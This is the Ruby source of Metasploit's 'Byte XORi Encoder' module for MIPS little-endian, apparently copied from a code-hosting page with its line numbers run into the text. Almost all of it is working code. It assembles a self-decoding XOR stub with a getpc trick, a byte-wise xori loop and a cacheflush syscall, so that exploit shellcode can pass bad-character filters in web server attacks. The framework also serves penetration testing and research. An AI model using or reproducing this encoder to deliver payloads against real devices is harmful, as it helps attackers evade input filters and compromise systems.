Path: blob/master/modules/encoders/mipsle/byte_xori.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasm'67class MetasploitModule < Msf::Encoder::Xor8Rank = NormalRanking910def initialize11super(12'Name' => 'Byte XORi Encoder',13'Description' => %q{14Mips Web server exploit friendly xor encoder. This encoder has been found useful on15situations where '&' (0x26) is a badchar. Since 0x26 is the xor's opcode on MIPS16architectures, this one is based on the xori instruction.17},18'Author' => [19'Julien Tinnes <julien[at]cr0.org>', # original longxor encoder, which this one is based on20'juan vazquez', # byte_xori encoder21'Pedro Ribeiro <[email protected]>', # fix for Linux >= 2.6.11 (set up cacheflush() args properly)22],23'Arch' => ARCH_MIPSLE,24'License' => MSF_LICENSE,25'Decoder' => {26'KeySize' => 1,27'BlockSize' => 1,28'KeyPack' => 'C'29})30end3132#33# Returns the decoder stub that is adjusted for the size of the buffer34# being encoded.35#36def decoder_stub(state)37# add 4 number of passes for the space reserved for the key, at the end of the decoder stub38# (see commented source)39number_of_passes = state.buf.length + 440raise EncodingError, "The payload being encoded is too long (#{state.buf.length} bytes)" if number_of_passes > 327664142# 16-bits not (again, see also commented source)43reg_14 = (number_of_passes + 1) ^ 0xFFFF44reg_5 = state.buf.length ^ 0xFFFF4546decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:little), <<~EOS).encoded.data47main:4849li macro reg, imm50addiu reg, $0, imm ; 0xYYYYXX24 - xx: reg #, yyyy: imm # imm must be equal or less than 0x7fff51endm5253li ($14, #{reg_14}) ; 0xXXXX0e24 - store in $14 the number of passes (two's complement) - xxxx (number of passes)54nor $14, $14, $0 ; 0x2770c001 - get in $14 the number of passes55li ($11,-84) ; 0xacff0b24 - store in $11 the offset to the end of the decoder (two's complement) (from the addu instr)5657; acts as getpc58next:59bltzal $8, next ; 0xffff1005 - branch to next if $8 < 0, store return address in $31 ($ra); pipelining executes next instr.60slti $8, $0, 0x#{slti_imm(state)} ; 0xXXXX0828 - Set $8 = 0; Set $8 = 1 if $0 < imm; else $8 = 0 / xxxx: imm6162nor $11, $11, $0 ; 0x27586001 - get in $11 the offset to the end of the decoder (from the addu instr)63addu $25, $31, $11 ; 0x21c8eb03 - get in $25 a pointer to the end of the decoder stub64addu $16, $31, $11 ; $16 too (used to set up the cacheflush() arg down below)6566slti $23, $0, 0x#{slti_imm(state)} ; 0xXXXX1728 - Set $23 = 0 (Set $23 = 1 if $0 < imm; else $23 = 0) / xxxx: imm67lb $17, -1($25) ; 0xffff3183 - Load xor key in $17 (stored on the last byte of the decoder stub)6869; Init $6 and $1570li ($13, -4) ; 0xfcff0d24 - $13 = -471nor $6, $13, $0 ; 0x2730a001 - $6 = 3 ; used to easily get the cacheflush parameter72addi $15, $6, -2 ; 0xfeffcf20 - $15 = 1 ($15 = decoding loop counter increment)7374; In order avoid null bytes, decode also the xor key, so memory can be75; referenced with offset -176loop:77lb $8, -4($25) ; 0xfcff2883 - Load in $8 the byte to decode78addu $23, $23, $15 ; 0x21b8ef02 - Increment the counter ($23)79xori $3, $8, 0x#{padded_key(state)} ; 0xf2610339 - xori decoding instruction, store the decoded byte on $380#{set_on_less_than(state)} ; 0xXXf0ee02 - $30 = 1 if $23 < $14; else $30 = 0 (update branch condition) / xx: 0x2b if slti, 0x2a if slt81sb $3, -4($25) ; 0xfcff23a3 - Store decoded byte on memory82bne $0, $30, loop ; 0xfaffc017 - branch to loop if $30 != 0 (ranch while bytes to decode)83addu $25, $25, $15 ; 0x21c82f03 - next instruction to decode, executed because of the pipelining8485addiu $4, $16, -4 ; cacheflush() addr parameter86li( $10,#{reg_5}) ; cacheflush() nbytes parameter87nor $5, $10, $0 ; same as above8889li ($2, 4147) ; 0x33100224 - cacheflush system call90syscall 0x52950 ; 0x0c544a0191nop ; encoded shellcoded must be here (xor key right here ;) after decoding will result in a nop92EOS9394return decoder95end9697def padded_key(state, size = 1)98key = Rex::Text.rand_text(size, state.badchars)99key << [state.key].pack('C')100return key.unpack('n')[0].to_s(16)101end102103# Returns an two-bytes immediate value without badchars. The value must be104# on the 0x8000-0x8fff so it is used as negative value by slti (set less105# than signed immediate)106def slti_imm(state)107imm = Rex::Text.rand_text(2, state.badchars + (0x00..0x7f).to_a.pack('C*'))108return imm.unpack('n')[0].to_s(16)109end110111# Since 0x14 contains the number of passes, and because of the li macro, can't be112# longer than 0x7fff, both sltu (unsigned) and slt (signed) operations can be used113# here114def set_on_less_than(state)115instructions = {116'sltu $30, $23, $14' => "\x2b\xf0\xee\x02", # set less than unsigned117'slt $30, $23, $14' => "\x2a\xf0\xee\x02" # set less than118}119120instructions.each do |k, v|121if Rex::Text.badchar_index(v, state.badchars).nil?122return k123end124end125126raise BadcharError.new,127"The #{name} encoder failed to encode the decoder stub without bad characters.",128caller129end130131def encode_finalize_stub(state, stub)132# Including the key into the stub by ourselves because it should be located133# in the last 4 bytes of the decoder stub. In this way decoding will convert134# these bytes into a nop instruction (0x00000000). The Msf::Encoder only supports135# one decoder_key_offset position136real_key = state.key137stub[-4, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)138stub[-3, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)139stub[-2, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)140stub[-1, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)141return stub142end143end144145146